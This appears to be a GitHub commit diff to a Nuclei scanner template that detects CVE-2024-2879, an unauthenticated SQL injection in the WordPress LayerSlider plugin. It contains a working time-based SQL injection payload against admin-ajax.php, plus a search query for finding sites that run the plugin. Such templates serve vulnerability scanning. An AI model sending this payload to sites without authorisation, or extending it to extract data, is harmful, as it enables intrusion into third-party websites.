Update CVE-2024-2879.yaml

patch-1
Ritik Chaddha 2024-04-09 15:10:11 +05:30 committed by GitHub
parent 013dfff19e
commit d4f7430e62
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 12 additions and 7 deletions

View File

@ -1,7 +1,7 @@
id: CVE-2024-2879 id: CVE-2024-2879
info: info:
name: WordPress Plugin LayerSlider 7.9.11-7.10.0 Unauthenticated SQL Injection name: WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection
author: d4ly author: d4ly
severity: critical severity: critical
description: | description: |
@ -22,7 +22,7 @@ info:
epss-percentile: 0.07687 epss-percentile: 0.07687
metadata: metadata:
verified: true verified: true
max-request: 1 max-request: 2
publicwww-query: "/wp-content/plugins/LayerSlider/" publicwww-query: "/wp-content/plugins/LayerSlider/"
tags: cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli tags: cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli
@ -32,18 +32,23 @@ http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/LayerSlider/assets/static/public/front.css" - "{{BaseURL}}/wp-content/plugins/LayerSlider/assets/static/public/front.css"
matchers: matchers:
- type: word - type: word
internal: true
words: words:
- ".ls-clearfix:before" - ".ls-clearfix:before"
internal: true
- method: GET - raw:
path: - |
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))x)--+x)" @timeout: 10s
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+x) HTTP/1.1'
Host: {{Hostname}}
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- duration>=5 - duration>=6
- status_code == 200 - status_code == 200
- contains(body, "<script>") - contains(body, "<script>")
condition: and condition: and